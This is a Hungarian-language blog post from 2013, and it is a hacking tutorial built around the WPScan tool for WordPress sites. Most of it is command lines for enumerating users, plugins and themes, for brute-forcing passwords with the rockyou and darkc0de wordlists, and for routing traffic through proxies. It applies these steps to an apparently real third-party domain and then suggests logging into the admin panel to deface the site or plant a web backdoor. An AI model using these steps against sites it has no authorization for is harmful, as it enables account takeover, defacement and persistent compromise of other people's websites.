2013. december 14., szombat

WordPress alapú oldalak scannelése

Szóval mi is az a WordPress?
Röviden egy PHP alapú tartalom kezelő rendszer, ha szeretnél többet megtudni: http://hu.wikipedia.org/wiki/WordPress
Azt fogom megmutatni, hogy hogyan kell ezeket az oldalakat scannelni és a felhasználókat megtalálni továbbá fel is törni őket .:)
Kell nekünk egy kis program amit WPScan-nek hívnak. Ez egy okos kis Ruby program sok mindent tud a plugineket brute force alapon felkutatni a témákat felkutatni stb...
(Ha Windows-on akarjuk használni akkor le kell töltenünk a Ruby-t innen.)
Magát a scriptet innen tudjuk letölteni: http://wpscan.org/
Kali Linux-on alapból van telepítve ha beírod, hogy wpscan akkor fogod tapasztalni. :)
Ha beírtad hogy wpscan akkor ki fog jönni a használati utasítás. Lefordítom nektek nem olyan nehéz .:)


-Segítség
ruby ./wpscan.rb --help

-Sima scannelés
ruby ./wpscan.rb --url www.example.com

-Felsorolt felhasználók szótárazása 50 menetes kör....
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

-'admin' felhasználó szótárazása...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

-Telepített pluginek felsorolása ...
ruby ./wpscan.rb --url www.example.com --enumerate p

-Telepített témák felsorolása ...
ruby ./wpscan.rb --url www.example.com --enumerate t

-Felhasználók felsorolása ...
ruby ./wpscan.rb --url www.example.com --enumerate u

-Telepített timthumbok felsorolása ...
ruby ./wpscan.rb --url www.example.com --enumerate tt

-HTTP Proxy használata ...
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118

-SOCKS5 proxy használata... (cURL >= v7.21.7 szükséges)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000

-Egyéni könyvtár tartalom használata ...
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content

-Egyéni plugin mappa használata ...
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Frissítés ...
ruby ./wpscan.rb --update

-Kimeneti hibakeresés ...
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

Röviden ennyi a használati utasítás magyarul :)
Akkor most nézzük meg,hogy néz ki egy sima scannelés.
wpscan --url www.nemtom.hu
Először is ellenőrzi hogy van-e wordpress a megadott oldalnál aztán elkezd hibát keresni. Ellenőrzi hogy a robots.txt elérhető-e aztán ha talál hibát valamelyik pluginban akkor jelzi. Pl úgy, hogy küld egy exploit linket,hogy azzal az exploittal ki lehet használni azt a hibát. :)
Ezután elkezdi keresni a témákat és a további szolgáltatásokat így néz ki a szimpla scan:
Ebben az oldalban van is hiba, DE nem fogom bántani mert nem az enyém a szerver...
Ezután megnézhetjük milyen pluginek vannak telepítve, ez így kivitelezhető:
wpscan --url www.nemtom.hu --enumerate p
Mielőtt nekifognak lefuttat egy szimpla scannelést aztán szótár alapon elkezdi nézegetni,hogy mik vannak telepítve
Ezután még lábnyomozhatunk tovább is, telepített témák, timthumbok, felhasználók stb
Minket inkább a felhasználók érdekelnek legallábbis engem igen :D
Ehhez írjuk be, hogy:
wpscan --url www.nemtom.hu --enumerate u
Így néz ki a felhasználó nevek listája:
Ezután lehet támadni szótárral (brute force) valamelyik felhasználót meg lehet támadni szóval akkor válasz ki egyet, és írd ezt:
wpscan --url www.nemtom.hu --wordlist /hely/rockyou.txt --username felhasználó
Mikor elkezdted akkor mint mindig egy szimpla scan-t elkezdi csinálni a dolgokat szótár alapon törni én most nem fogom feltörni a felhasználót mert mint írtam nem az enyém a szerver...
Ha megvan a felhasználó akkor be lehet lépni http://nemtom.hu/wp-admin/
Belépsz és azt csinálsz amit akarsz ha megvan az admin akkor akár defacelni is tudsz web backdoort feltenni stb :)
Ennyi lenne remélem érthető volt kösz,hogy elolvastad :)